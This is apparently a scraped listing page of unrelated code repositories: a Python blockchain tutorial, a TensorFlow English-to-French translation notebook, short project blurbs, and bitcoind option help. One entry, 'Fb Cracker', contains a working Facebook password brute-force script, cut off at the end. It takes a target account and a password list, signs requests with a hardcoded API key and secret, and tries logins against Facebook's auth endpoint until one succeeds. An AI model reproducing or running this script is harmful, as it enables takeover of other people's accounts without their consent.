426 skills found · Page 6 of 15
etherceo1x1 / CodesBUILD YOUR OWN BLOCKCHAIN: A PYTHON TUTORIAL Download the full Jupyter/iPython notebook from Github here Build Your Own Blockchain – The Basics¶ This tutorial will walk you through the basics of how to build a blockchain from scratch. Focusing on the details of a concrete example will provide a deeper understanding of the strengths and limitations of blockchains. For a higher-level overview, I’d recommend this excellent article from BitsOnBlocks. Transactions, Validation, and updating system state¶ At its core, a blockchain is a distributed database with a set of rules for verifying new additions to the database. We’ll start off by tracking the accounts of two imaginary people: Alice and Bob, who will trade virtual money with each other. We’ll need to create a transaction pool of incoming transactions, validate those transactions, and make them into a block. We’ll be using a hash function to create a ‘fingerprint’ for each of our transactions- this hash function links each of our blocks to each other. To make this easier to use, we’ll define a helper function to wrap the python hash function that we’re using. In [1]: import hashlib, json, sys def hashMe(msg=""): # For convenience, this is a helper function that wraps our hashing algorithm if type(msg)!=str: msg = json.dumps(msg,sort_keys=True) # If we don't sort keys, we can't guarantee repeatability! if sys.version_info.major == 2: return unicode(hashlib.sha256(msg).hexdigest(),'utf-8') else: return hashlib.sha256(str(msg).encode('utf-8')).hexdigest() Next, we want to create a function to generate exchanges between Alice and Bob. We’ll indicate withdrawals with negative numbers, and deposits with positive numbers. We’ll construct our transactions to always be between the two users of our system, and make sure that the deposit is the same magnitude as the withdrawal- i.e. that we’re neither creating nor destroying money. In [2]: import random random.seed(0) def makeTransaction(maxValue=3): # This will create valid transactions in the range of (1,maxValue) sign = int(random.getrandbits(1))*2 - 1 # This will randomly choose -1 or 1 amount = random.randint(1,maxValue) alicePays = sign * amount bobPays = -1 * alicePays # By construction, this will always return transactions that respect the conservation of tokens. # However, note that we have not done anything to check whether these overdraft an account return {u'Alice':alicePays,u'Bob':bobPays} Now let’s create a large set of transactions, then chunk them into blocks. In [3]: txnBuffer = [makeTransaction() for i in range(30)] Next step: making our very own blocks! We’ll take the first k transactions from the transaction buffer, and turn them into a block. Before we do that, we need to define a method for checking the valididty of the transactions we’ve pulled into the block. For bitcoin, the validation function checks that the input values are valid unspent transaction outputs (UTXOs), that the outputs of the transaction are no greater than the input, and that the keys used for the signatures are valid. In Ethereum, the validation function checks that the smart contracts were faithfully executed and respect gas limits. No worries, though- we don’t have to build a system that complicated. We’ll define our own, very simple set of rules which make sense for a basic token system: The sum of deposits and withdrawals must be 0 (tokens are neither created nor destroyed) A user’s account must have sufficient funds to cover any withdrawals If either of these conditions are violated, we’ll reject the transaction. In [4]: def updateState(txn, state): # Inputs: txn, state: dictionaries keyed with account names, holding numeric values for transfer amount (txn) or account balance (state) # Returns: Updated state, with additional users added to state if necessary # NOTE: This does not not validate the transaction- just updates the state! # If the transaction is valid, then update the state state = state.copy() # As dictionaries are mutable, let's avoid any confusion by creating a working copy of the data. for key in txn: if key in state.keys(): state[key] += txn[key] else: state[key] = txn[key] return state In [5]: def isValidTxn(txn,state): # Assume that the transaction is a dictionary keyed by account names # Check that the sum of the deposits and withdrawals is 0 if sum(txn.values()) is not 0: return False # Check that the transaction does not cause an overdraft for key in txn.keys(): if key in state.keys(): acctBalance = state[key] else: acctBalance = 0 if (acctBalance + txn[key]) < 0: return False return True Here are a set of sample transactions, some of which are fraudulent- but we can now check their validity! In [6]: state = {u'Alice':5,u'Bob':5} print(isValidTxn({u'Alice': -3, u'Bob': 3},state)) # Basic transaction- this works great! print(isValidTxn({u'Alice': -4, u'Bob': 3},state)) # But we can't create or destroy tokens! print(isValidTxn({u'Alice': -6, u'Bob': 6},state)) # We also can't overdraft our account. print(isValidTxn({u'Alice': -4, u'Bob': 2,'Lisa':2},state)) # Creating new users is valid print(isValidTxn({u'Alice': -4, u'Bob': 3,'Lisa':2},state)) # But the same rules still apply! True False False True False Each block contains a batch of transactions, a reference to the hash of the previous block (if block number is greater than 1), and a hash of its contents and the header Building the Blockchain: From Transactions to Blocks¶ We’re ready to start making our blockchain! Right now, there’s nothing on the blockchain, but we can get things started by defining the ‘genesis block’ (the first block in the system). Because the genesis block isn’t linked to any prior block, it gets treated a bit differently, and we can arbitrarily set the system state. In our case, we’ll create accounts for our two users (Alice and Bob) and give them 50 coins each. In [7]: state = {u'Alice':50, u'Bob':50} # Define the initial state genesisBlockTxns = [state] genesisBlockContents = {u'blockNumber':0,u'parentHash':None,u'txnCount':1,u'txns':genesisBlockTxns} genesisHash = hashMe( genesisBlockContents ) genesisBlock = {u'hash':genesisHash,u'contents':genesisBlockContents} genesisBlockStr = json.dumps(genesisBlock, sort_keys=True) Great! This becomes the first element from which everything else will be linked. In [8]: chain = [genesisBlock] For each block, we want to collect a set of transactions, create a header, hash it, and add it to the chain In [9]: def makeBlock(txns,chain): parentBlock = chain[-1] parentHash = parentBlock[u'hash'] blockNumber = parentBlock[u'contents'][u'blockNumber'] + 1 txnCount = len(txns) blockContents = {u'blockNumber':blockNumber,u'parentHash':parentHash, u'txnCount':len(txns),'txns':txns} blockHash = hashMe( blockContents ) block = {u'hash':blockHash,u'contents':blockContents} return block Let’s use this to process our transaction buffer into a set of blocks: In [10]: blockSizeLimit = 5 # Arbitrary number of transactions per block- # this is chosen by the block miner, and can vary between blocks! while len(txnBuffer) > 0: bufferStartSize = len(txnBuffer) ## Gather a set of valid transactions for inclusion txnList = [] while (len(txnBuffer) > 0) & (len(txnList) < blockSizeLimit): newTxn = txnBuffer.pop() validTxn = isValidTxn(newTxn,state) # This will return False if txn is invalid if validTxn: # If we got a valid state, not 'False' txnList.append(newTxn) state = updateState(newTxn,state) else: print("ignored transaction") sys.stdout.flush() continue # This was an invalid transaction; ignore it and move on ## Make a block myBlock = makeBlock(txnList,chain) chain.append(myBlock) In [11]: chain[0] Out[11]: {'contents': {'blockNumber': 0, 'parentHash': None, 'txnCount': 1, 'txns': [{'Alice': 50, 'Bob': 50}]}, 'hash': '7c88a4312054f89a2b73b04989cd9b9e1ae437e1048f89fbb4e18a08479de507'} In [12]: chain[1] Out[12]: {'contents': {'blockNumber': 1, 'parentHash': '7c88a4312054f89a2b73b04989cd9b9e1ae437e1048f89fbb4e18a08479de507', 'txnCount': 5, 'txns': [{'Alice': 3, 'Bob': -3}, {'Alice': -1, 'Bob': 1}, {'Alice': 3, 'Bob': -3}, {'Alice': -2, 'Bob': 2}, {'Alice': 3, 'Bob': -3}]}, 'hash': '7a91fc8206c5351293fd11200b33b7192e87fad6545504068a51aba868bc6f72'} As expected, the genesis block includes an invalid transaction which initiates account balances (creating tokens out of thin air). The hash of the parent block is referenced in the child block, which contains a set of new transactions which affect system state. We can now see the state of the system, updated to include the transactions: In [13]: state Out[13]: {'Alice': 72, 'Bob': 28} Checking Chain Validity¶ Now that we know how to create new blocks and link them together into a chain, let’s define functions to check that new blocks are valid- and that the whole chain is valid. On a blockchain network, this becomes important in two ways: When we initially set up our node, we will download the full blockchain history. After downloading the chain, we would need to run through the blockchain to compute the state of the system. To protect against somebody inserting invalid transactions in the initial chain, we need to check the validity of the entire chain in this initial download. Once our node is synced with the network (has an up-to-date copy of the blockchain and a representation of system state) it will need to check the validity of new blocks that are broadcast to the network. We will need three functions to facilitate in this: checkBlockHash: A simple helper function that makes sure that the block contents match the hash checkBlockValidity: Checks the validity of a block, given its parent and the current system state. We want this to return the updated state if the block is valid, and raise an error otherwise. checkChain: Check the validity of the entire chain, and compute the system state beginning at the genesis block. This will return the system state if the chain is valid, and raise an error otherwise. In [14]: def checkBlockHash(block): # Raise an exception if the hash does not match the block contents expectedHash = hashMe( block['contents'] ) if block['hash']!=expectedHash: raise Exception('Hash does not match contents of block %s'% block['contents']['blockNumber']) return In [15]: def checkBlockValidity(block,parent,state): # We want to check the following conditions: # - Each of the transactions are valid updates to the system state # - Block hash is valid for the block contents # - Block number increments the parent block number by 1 # - Accurately references the parent block's hash parentNumber = parent['contents']['blockNumber'] parentHash = parent['hash'] blockNumber = block['contents']['blockNumber'] # Check transaction validity; throw an error if an invalid transaction was found. for txn in block['contents']['txns']: if isValidTxn(txn,state): state = updateState(txn,state) else: raise Exception('Invalid transaction in block %s: %s'%(blockNumber,txn)) checkBlockHash(block) # Check hash integrity; raises error if inaccurate if blockNumber!=(parentNumber+1): raise Exception('Hash does not match contents of block %s'%blockNumber) if block['contents']['parentHash'] != parentHash: raise Exception('Parent hash not accurate at block %s'%blockNumber) return state In [16]: def checkChain(chain): # Work through the chain from the genesis block (which gets special treatment), # checking that all transactions are internally valid, # that the transactions do not cause an overdraft, # and that the blocks are linked by their hashes. # This returns the state as a dictionary of accounts and balances, # or returns False if an error was detected ## Data input processing: Make sure that our chain is a list of dicts if type(chain)==str: try: chain = json.loads(chain) assert( type(chain)==list) except: # This is a catch-all, admittedly crude return False elif type(chain)!=list: return False state = {} ## Prime the pump by checking the genesis block # We want to check the following conditions: # - Each of the transactions are valid updates to the system state # - Block hash is valid for the block contents for txn in chain[0]['contents']['txns']: state = updateState(txn,state) checkBlockHash(chain[0]) parent = chain[0] ## Checking subsequent blocks: These additionally need to check # - the reference to the parent block's hash # - the validity of the block number for block in chain[1:]: state = checkBlockValidity(block,parent,state) parent = block return state We can now check the validity of the state: In [17]: checkChain(chain) Out[17]: {'Alice': 72, 'Bob': 28} And even if we are loading the chain from a text file, e.g. from backup or loading it for the first time, we can check the integrity of the chain and create the current state: In [18]: chainAsText = json.dumps(chain,sort_keys=True) checkChain(chainAsText) Out[18]: {'Alice': 72, 'Bob': 28} Putting it together: The final Blockchain Architecture¶ In an actual blockchain network, new nodes would download a copy of the blockchain and verify it (as we just did above), then announce their presence on the peer-to-peer network and start listening for transactions. Bundling transactions into a block, they then pass their proposed block on to other nodes. We’ve seen how to verify a copy of the blockchain, and how to bundle transactions into a block. If we recieve a block from somewhere else, verifying it and adding it to our blockchain is easy. Let’s say that the following code runs on Node A, which mines the block: In [19]: import copy nodeBchain = copy.copy(chain) nodeBtxns = [makeTransaction() for i in range(5)] newBlock = makeBlock(nodeBtxns,nodeBchain) Now assume that the newBlock is transmitted to our node, and we want to check it and update our state if it is a valid block: In [20]: print("Blockchain on Node A is currently %s blocks long"%len(chain)) try: print("New Block Received; checking validity...") state = checkBlockValidity(newBlock,chain[-1],state) # Update the state- this will throw an error if the block is invalid! chain.append(newBlock) except: print("Invalid block; ignoring and waiting for the next block...") print("Blockchain on Node A is now %s blocks long"%len(chain)) Blockchain on Node A is currently 7 blocks long New Block Received; checking validity... Blockchain on Node A is now 8 blocks long
TobiasVanDyk / VS1053 Micro Midi Synthesizer2017: VS1053 Micro Midi Synthesizer: This uses the VLSI VS1053b Audio and Midi DSP chip in its real-time Midi mode. In this mode it acts as a 64 voice polyphonic GM (General Midi) Midi synthesizer. An Arduino Uno standalone micro controls an OLED display, three buttons (Function Select and Up or Down, and passes the Midi data stream through to the audio DSP. The music board chosen was the Adafruit VS1053 codec breakout board
potatowaffles / TouchMaiHackreads touchscreen data & passes it in to a data structure
rvagg / Archived Level Ttl CacheA pass-through cache for arbitrary objects or binary data using LevelDB, expired by a TTL
gabrieldim / JQuery Box TravelRead data from JSON and make an animation in JavaScript with one box traveling as it passes the JSON
RdH4CK3r / Fb Crackerute.py - Facebook Brute Force # -*- coding: utf-8 -*- ## import os import sys import urllib import hashlib API_SECRET = "62f8ce9f74b12f84c123cc23437a4a32" __banner__ = """ +=======================================+ |..........Facebook Cracker v 1.........| +---------------------------------------+ |#Author: DedSecTL <dtlily> | |#Contact: Telegram @dtlily | |#Date: Fri Feb 8 10:15:49 2019 | |#This tool is made for pentesting. | |#Changing the description of this tool | |Won't made you the coder !!! | |#Respect Coderz | |#I take no responsibilities for the | | use of this program ! | +=======================================+ |..........Facebook Cracker v 1.........| +---------------------------------------+ """ print("[+] Facebook Brute Force\n") userid = raw_input("[*] Enter [Email|Phone|Username|ID]: ") try: passlist = raw_input("[*] Set PATH to passlist: ") if os.path.exists(passlist) != False: print(__banner__) print(" [+] Account to crack : {}".format(userid)) print(" [+] Loaded : {}".format(len(open(passlist,"r").read().split("\n")))) print(" [+] Cracking, please wait ...") for passwd in open(passlist,'r').readlines(): sys.stdout.write(u"\u001b[1000D[*] Trying {}".format(passwd.strip())) sys.stdout.flush() sig = "api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail={}format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword={}return_ssl_resources=0v=1.0{}".format(userid,passwd.strip(),API_SECRET) xx = hashlib.md5(sig).hexdigest() data = "api_key=882a8490361da98702bf97a021ddc14d&credentials_type=password&email={}&format=JSON&generate_machine_id=1&generate_session_cookies=1&locale=en_US&method=auth.login&password={}&return_ssl_resources=0&v=1.0&sig={}".format(userid,passwd.strip(),xx) response = urllib.urlopen("https://api.facebook.com/restserver.php?{}".format(data)).read() if "error" in response: pass else: print("\n\n[+] Password found .. !!") print("\n[+] Password : {}".format(passwd.strip())) break print("\n\n[!] Done .. !!") else: print("fbbrute: error: No such file or directory") except KeyboardInterrupt:
Rushikesh8983 / MastersDataScience Deep Learning ProjectLanguage Translation In this project, you’re going to take a peek into the realm of neural network machine translation. You’ll be training a sequence to sequence model on a dataset of English and French sentences that can translate new sentences from English to French. Get the Data Since translating the whole language of English to French will take lots of time to train, we have provided you with a small portion of the English corpus. """ DON'T MODIFY ANYTHING IN THIS CELL """ import helper import problem_unittests as tests source_path = 'data/small_vocab_en' target_path = 'data/small_vocab_fr' source_text = helper.load_data(source_path) target_text = helper.load_data(target_path) Explore the Data Play around with view_sentence_range to view different parts of the data. view_sentence_range = (0, 10) """ DON'T MODIFY ANYTHING IN THIS CELL """ import numpy as np print('Dataset Stats') print('Roughly the number of unique words: {}'.format(len({word: None for word in source_text.split()}))) sentences = source_text.split('\n') word_counts = [len(sentence.split()) for sentence in sentences] print('Number of sentences: {}'.format(len(sentences))) print('Average number of words in a sentence: {}'.format(np.average(word_counts))) print() print('English sentences {} to {}:'.format(*view_sentence_range)) print('\n'.join(source_text.split('\n')[view_sentence_range[0]:view_sentence_range[1]])) print() print('French sentences {} to {}:'.format(*view_sentence_range)) print('\n'.join(target_text.split('\n')[view_sentence_range[0]:view_sentence_range[1]])) Dataset Stats Roughly the number of unique words: 227 Number of sentences: 137861 Average number of words in a sentence: 13.225277634719028 English sentences 0 to 10: new jersey is sometimes quiet during autumn , and it is snowy in april . the united states is usually chilly during july , and it is usually freezing in november . california is usually quiet during march , and it is usually hot in june . the united states is sometimes mild during june , and it is cold in september . your least liked fruit is the grape , but my least liked is the apple . his favorite fruit is the orange , but my favorite is the grape . paris is relaxing during december , but it is usually chilly in july . new jersey is busy during spring , and it is never hot in march . our least liked fruit is the lemon , but my least liked is the grape . the united states is sometimes busy during january , and it is sometimes warm in november . French sentences 0 to 10: new jersey est parfois calme pendant l' automne , et il est neigeux en avril . les états-unis est généralement froid en juillet , et il gèle habituellement en novembre . california est généralement calme en mars , et il est généralement chaud en juin . les états-unis est parfois légère en juin , et il fait froid en septembre . votre moins aimé fruit est le raisin , mais mon moins aimé est la pomme . son fruit préféré est l'orange , mais mon préféré est le raisin . paris est relaxant en décembre , mais il est généralement froid en juillet . new jersey est occupé au printemps , et il est jamais chaude en mars . notre fruit est moins aimé le citron , mais mon moins aimé est le raisin . les états-unis est parfois occupé en janvier , et il est parfois chaud en novembre . Implement Preprocessing Function Text to Word Ids As you did with other RNNs, you must turn the text into a number so the computer can understand it. In the function text_to_ids(), you'll turn source_text and target_text from words to ids. However, you need to add the <EOS> word id at the end of target_text. This will help the neural network predict when the sentence should end. You can get the <EOS> word id by doing: target_vocab_to_int['<EOS>'] You can get other word ids using source_vocab_to_int and target_vocab_to_int. def text_to_ids(source_text, target_text, source_vocab_to_int, target_vocab_to_int): """ Convert source and target text to proper word ids :param source_text: String that contains all the source text. :param target_text: String that contains all the target text. :param source_vocab_to_int: Dictionary to go from the source words to an id :param target_vocab_to_int: Dictionary to go from the target words to an id :return: A tuple of lists (source_id_text, target_id_text) """ # TODO: Implement Function source_id_text = [[source_vocab_to_int[word] for word in sentence.split()] \ for sentence in source_text.split('\n')] target_id_text = [[target_vocab_to_int[word] for word in sentence.split()] + [target_vocab_to_int['<EOS>']] \ for sentence in target_text.split('\n')] return source_id_text, target_id_text """ DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE """ tests.test_text_to_ids(text_to_ids) Tests Passed Preprocess all the data and save it Running the code cell below will preprocess all the data and save it to file. """ DON'T MODIFY ANYTHING IN THIS CELL """ helper.preprocess_and_save_data(source_path, target_path, text_to_ids) Check Point This is your first checkpoint. If you ever decide to come back to this notebook or have to restart the notebook, you can start from here. The preprocessed data has been saved to disk. import problem_unittests as tests """ DON'T MODIFY ANYTHING IN THIS CELL """ import numpy as np import helper (source_int_text, target_int_text), (source_vocab_to_int, target_vocab_to_int), _ = helper.load_preprocess() Check the Version of TensorFlow and Access to GPU This will check to make sure you have the correct version of TensorFlow and access to a GPU """ DON'T MODIFY ANYTHING IN THIS CELL """ from distutils.version import LooseVersion import warnings import tensorflow as tf from tensorflow.python.layers.core import Dense # Check TensorFlow Version assert LooseVersion(tf.__version__) >= LooseVersion('1.1'), 'Please use TensorFlow version 1.1 or newer' print('TensorFlow Version: {}'.format(tf.__version__)) # Check for a GPU if not tf.test.gpu_device_name(): warnings.warn('No GPU found. Please use a GPU to train your neural network.') else: print('Default GPU Device: {}'.format(tf.test.gpu_device_name())) TensorFlow Version: 1.1.0 Default GPU Device: /gpu:0 Build the Neural Network You'll build the components necessary to build a Sequence-to-Sequence model by implementing the following functions below: model_inputs process_decoder_input encoding_layer decoding_layer_train decoding_layer_infer decoding_layer seq2seq_model Input Implement the model_inputs() function to create TF Placeholders for the Neural Network. It should create the following placeholders: Input text placeholder named "input" using the TF Placeholder name parameter with rank 2. Targets placeholder with rank 2. Learning rate placeholder with rank 0. Keep probability placeholder named "keep_prob" using the TF Placeholder name parameter with rank 0. Target sequence length placeholder named "target_sequence_length" with rank 1 Max target sequence length tensor named "max_target_len" getting its value from applying tf.reduce_max on the target_sequence_length placeholder. Rank 0. Source sequence length placeholder named "source_sequence_length" with rank 1 Return the placeholders in the following the tuple (input, targets, learning rate, keep probability, target sequence length, max target sequence length, source sequence length) def model_inputs(): """ Create TF Placeholders for input, targets, learning rate, and lengths of source and target sequences. :return: Tuple (input, targets, learning rate, keep probability, target sequence length, max target sequence length, source sequence length) """ # TODO: Implement Function inputs = tf.placeholder(tf.int32, [None, None], 'input') targets = tf.placeholder(tf.int32, [None, None]) learning_rate = tf.placeholder(tf.float32, []) keep_prob = tf.placeholder(tf.float32, [], 'keep_prob') target_sequence_length = tf.placeholder(tf.int32, [None], 'target_sequence_length') max_target_len = tf.reduce_max(target_sequence_length) source_sequence_length = tf.placeholder(tf.int32, [None], 'source_sequence_length') return inputs, targets, learning_rate, keep_prob, target_sequence_length, max_target_len, source_sequence_length """ DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE """ tests.test_model_inputs(model_inputs) Tests Passed Process Decoder Input Implement process_decoder_input by removing the last word id from each batch in target_data and concat the GO ID to the begining of each batch. def process_decoder_input(target_data, target_vocab_to_int, batch_size): """ Preprocess target data for encoding :param target_data: Target Placehoder :param target_vocab_to_int: Dictionary to go from the target words to an id :param batch_size: Batch Size :return: Preprocessed target data """ # TODO: Implement Function go = tf.constant([[target_vocab_to_int['<GO>']]]*batch_size) # end = tf.slice(target_data, [0, 0], [-1, batch_size]) end = tf.strided_slice(target_data, [0, 0], [batch_size, -1], [1, 1]) return tf.concat([go, end], 1) """ DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE """ tests.test_process_encoding_input(process_decoder_input) Tests Passed Encoding Implement encoding_layer() to create a Encoder RNN layer: Embed the encoder input using tf.contrib.layers.embed_sequence Construct a stacked tf.contrib.rnn.LSTMCell wrapped in a tf.contrib.rnn.DropoutWrapper Pass cell and embedded input to tf.nn.dynamic_rnn() from imp import reload reload(tests) def encoding_layer(rnn_inputs, rnn_size, num_layers, keep_prob, source_sequence_length, source_vocab_size, encoding_embedding_size): """ Create encoding layer :param rnn_inputs: Inputs for the RNN :param rnn_size: RNN Size :param num_layers: Number of layers :param keep_prob: Dropout keep probability :param source_sequence_length: a list of the lengths of each sequence in the batch :param source_vocab_size: vocabulary size of source data :param encoding_embedding_size: embedding size of source data :return: tuple (RNN output, RNN state) """ # TODO: Implement Function embed = tf.contrib.layers.embed_sequence(rnn_inputs, source_vocab_size, encoding_embedding_size) def lstm_cell(): lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size) return tf.contrib.rnn.DropoutWrapper(lstm, keep_prob) stacked_lstm = tf.contrib.rnn.MultiRNNCell([lstm_cell() for _ in range(num_layers)]) # initial_state = stacked_lstm.zero_state(source_sequence_length, tf.float32) return tf.nn.dynamic_rnn(stacked_lstm, embed, source_sequence_length, dtype=tf.float32) # initial_state=initial_state) """ DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE """ tests.test_encoding_layer(encoding_layer) Tests Passed Decoding - Training Create a training decoding layer: Create a tf.contrib.seq2seq.TrainingHelper Create a tf.contrib.seq2seq.BasicDecoder Obtain the decoder outputs from tf.contrib.seq2seq.dynamic_decode def decoding_layer_train(encoder_state, dec_cell, dec_embed_input, target_sequence_length, max_summary_length, output_layer, keep_prob): """ Create a decoding layer for training :param encoder_state: Encoder State :param dec_cell: Decoder RNN Cell :param dec_embed_input: Decoder embedded input :param target_sequence_length: The lengths of each sequence in the target batch :param max_summary_length: The length of the longest sequence in the batch :param output_layer: Function to apply the output layer :param keep_prob: Dropout keep probability :return: BasicDecoderOutput containing training logits and sample_id """ # TODO: Implement Function helper = tf.contrib.seq2seq.TrainingHelper(dec_embed_input, target_sequence_length) decoder = tf.contrib.seq2seq.BasicDecoder(dec_cell, helper, encoder_state, output_layer) dec_train_logits, _ = tf.contrib.seq2seq.dynamic_decode(decoder, maximum_iterations=max_summary_length) # for tensorflow 1.2: # dec_train_logits, _, _ = tf.contrib.seq2seq.dynamic_decode(decoder, maximum_iterations=max_summary_length) return dec_train_logits # keep_prob/dropout not used? """ DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE """ tests.test_decoding_layer_train(decoding_layer_train) Tests Passed Decoding - Inference Create inference decoder: Create a tf.contrib.seq2seq.GreedyEmbeddingHelper Create a tf.contrib.seq2seq.BasicDecoder Obtain the decoder outputs from tf.contrib.seq2seq.dynamic_decode def decoding_layer_infer(encoder_state, dec_cell, dec_embeddings, start_of_sequence_id, end_of_sequence_id, max_target_sequence_length, vocab_size, output_layer, batch_size, keep_prob): """ Create a decoding layer for inference :param encoder_state: Encoder state :param dec_cell: Decoder RNN Cell :param dec_embeddings: Decoder embeddings :param start_of_sequence_id: GO ID :param end_of_sequence_id: EOS Id :param max_target_sequence_length: Maximum length of target sequences :param vocab_size: Size of decoder/target vocabulary :param decoding_scope: TenorFlow Variable Scope for decoding :param output_layer: Function to apply the output layer :param batch_size: Batch size :param keep_prob: Dropout keep probability :return: BasicDecoderOutput containing inference logits and sample_id """ # TODO: Implement Function start_tokens = tf.constant([start_of_sequence_id]*batch_size) helper = tf.contrib.seq2seq.GreedyEmbeddingHelper(dec_embeddings, start_tokens, end_of_sequence_id) decoder = tf.contrib.seq2seq.BasicDecoder(dec_cell, helper, encoder_state, output_layer) dec_infer_logits, _ = tf.contrib.seq2seq.dynamic_decode(decoder, maximum_iterations=max_target_sequence_length) # for tensorflow 1.2: # dec_infer_logits, _, _ = tf.contrib.seq2seq.dynamic_decode(decoder, maximum_iterations=max_target_sequence_length) return dec_infer_logits """ DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE """ tests.test_decoding_layer_infer(decoding_layer_infer)
Sjeanpierre / Passenger Datadog MonitorGolang application for reporting Phusion Passenger stats to DataDog via statsD
gardner-lab / Syllable Detector SwiftUsing Core Audio to perform STFT and pass the amplitude data into a Matlab trained neural network.
jeffbski / Pass Streampass-stream - pass-through node.js stream which can filter/adapt and pause data
Eternal973 / Mai22maitouchConvert mai2touch serial data to 'old cab' maimai game(e.g. maimai FiNALE) touch, auto pass start check.
danimoreira90 / Soccer Data AnalysisA soccer match can generate thousands of data, from detailed statistics like passes and player movements, to more complex data such a team's performance. In this work we look forward to come up with interactive and instructional data visualizations which may allow analysts, technicians, managers and even ordinary fans taking concise decisions
heru299 / Script Copy-? Print this help message and exit -alertnotify=<cmd> Execute command when a relevant alert is received or we see a really long fork (%s in cmd is replaced by message) -assumevalid=<hex> If this block is in the chain assume that it and its ancestors are valid and potentially skip their script verification (0 to verify all, default: 0000000000000000000b9d2ec5a352ecba0592946514a92f14319dc2b367fc72, testnet: 000000000000006433d1efec504c53ca332b64963c425395515b01977bd7b3b0, signet: 0000002a1de0f46379358c1fd09906f7ac59adf3712323ed90eb59e4c183c020) -blockfilterindex=<type> Maintain an index of compact filters by block (default: 0, values: basic). If <type> is not supplied or if <type> = 1, indexes for all known types are enabled. -blocknotify=<cmd> Execute command when the best block changes (%s in cmd is replaced by block hash) -blockreconstructionextratxn=<n> Extra transactions to keep in memory for compact block reconstructions (default: 100) -blocksdir=<dir> Specify directory to hold blocks subdirectory for *.dat files (default: <datadir>) -blocksonly Whether to reject transactions from network peers. Automatic broadcast and rebroadcast of any transactions from inbound peers is disabled, unless the peer has the 'forcerelay' permission. RPC transactions are not affected. (default: 0) -conf=<file> Specify path to read-only configuration file. Relative paths will be prefixed by datadir location. (default: bitcoin.conf) -daemon Run in the background as a daemon and accept commands -datadir=<dir> Specify data directory -dbcache=<n> Maximum database cache size <n> MiB (4 to 16384, default: 450). In addition, unused mempool memory is shared for this cache (see -maxmempool). -debuglogfile=<file> Specify location of debug log file. Relative paths will be prefixed by a net-specific datadir location. (-nodebuglogfile to disable; default: debug.log) -includeconf=<file> Specify additional configuration file, relative to the -datadir path (only useable from configuration file, not command line) -loadblock=<file> Imports blocks from external file on startup -maxmempool=<n> Keep the transaction memory pool below <n> megabytes (default: 300) -maxorphantx=<n> Keep at most <n> unconnectable transactions in memory (default: 100) -mempoolexpiry=<n> Do not keep transactions in the mempool longer than <n> hours (default: 336) -par=<n> Set the number of script verification threads (-8 to 15, 0 = auto, <0 = leave that many cores free, default: 0) -persistmempool Whether to save the mempool on shutdown and load on restart (default: 1) -pid=<file> Specify pid file. Relative paths will be prefixed by a net-specific datadir location. (default: bitcoind.pid) -prune=<n> Reduce storage requirements by enabling pruning (deleting) of old blocks. This allows the pruneblockchain RPC to be called to delete specific blocks, and enables automatic pruning of old blocks if a target size in MiB is provided. This mode is incompatible with -txindex and -rescan. Warning: Reverting this setting requires re-downloading the entire blockchain. (default: 0 = disable pruning blocks, 1 = allow manual pruning via RPC, >=550 = automatically prune block files to stay under the specified target size in MiB) -reindex Rebuild chain state and block index from the blk*.dat files on disk -reindex-chainstate Rebuild chain state from the currently indexed blocks. When in pruning mode or if blocks on disk might be corrupted, use full -reindex instead. -settings=<file> Specify path to dynamic settings data file. Can be disabled with -nosettings. File is written at runtime and not meant to be edited by users (use bitcoin.conf instead for custom settings). Relative paths will be prefixed by datadir location. (default: settings.json) -startupnotify=<cmd> Execute command on startup. -sysperms Create new files with system default permissions, instead of umask 077 (only effective with disabled wallet functionality) -txindex Maintain a full transaction index, used by the getrawtransaction rpc call (default: 0) -version Print version and exit Connection options: -addnode=<ip> Add a node to connect to and attempt to keep the connection open (see the `addnode` RPC command help for more info). This option can be specified multiple times to add multiple nodes. -asmap=<file> Specify asn mapping used for bucketing of the peers (default: ip_asn.map). Relative paths will be prefixed by the net-specific datadir location. -bantime=<n> Default duration (in seconds) of manually configured bans (default: 86400) -bind=<addr>[:<port>][=onion] Bind to given address and always listen on it (default: 0.0.0.0). Use [host]:port notation for IPv6. Append =onion to tag any incoming connections to that address and port as incoming Tor connections (default: 127.0.0.1:8334=onion, testnet: 127.0.0.1:18334=onion, signet: 127.0.0.1:38334=onion, regtest: 127.0.0.1:18445=onion) -connect=<ip> Connect only to the specified node; -noconnect disables automatic connections (the rules for this peer are the same as for -addnode). This option can be specified multiple times to connect to multiple nodes. -discover Discover own IP addresses (default: 1 when listening and no -externalip or -proxy) -dns Allow DNS lookups for -addnode, -seednode and -connect (default: 1) -dnsseed Query for peer addresses via DNS lookup, if low on addresses (default: 1 unless -connect used) -externalip=<ip> Specify your own public address -forcednsseed Always query for peer addresses via DNS lookup (default: 0) -listen Accept connections from outside (default: 1 if no -proxy or -connect) -listenonion Automatically create Tor onion service (default: 1) -maxconnections=<n> Maintain at most <n> connections to peers (default: 125) -maxreceivebuffer=<n> Maximum per-connection receive buffer, <n>*1000 bytes (default: 5000) -maxsendbuffer=<n> Maximum per-connection send buffer, <n>*1000 bytes (default: 1000) -maxtimeadjustment Maximum allowed median peer time offset adjustment. Local perspective of time may be influenced by peers forward or backward by this amount. (default: 4200 seconds) -maxuploadtarget=<n> Tries to keep outbound traffic under the given target (in MiB per 24h). Limit does not apply to peers with 'download' permission. 0 = no limit (default: 0) -networkactive Enable all P2P network activity (default: 1). Can be changed by the setnetworkactive RPC command -onion=<ip:port> Use separate SOCKS5 proxy to reach peers via Tor onion services, set -noonion to disable (default: -proxy) -onlynet=<net> Make outgoing connections only through network <net> (ipv4, ipv6 or onion). Incoming connections are not affected by this option. This option can be specified multiple times to allow multiple networks. -peerblockfilters Serve compact block filters to peers per BIP 157 (default: 0) -peerbloomfilters Support filtering of blocks and transaction with bloom filters (default: 0) -permitbaremultisig Relay non-P2SH multisig (default: 1) -port=<port> Listen for connections on <port>. Nodes not using the default ports (default: 8333, testnet: 18333, signet: 38333, regtest: 18444) are unlikely to get incoming connections. -proxy=<ip:port> Connect through SOCKS5 proxy, set -noproxy to disable (default: disabled) -proxyrandomize Randomize credentials for every proxy connection. This enables Tor stream 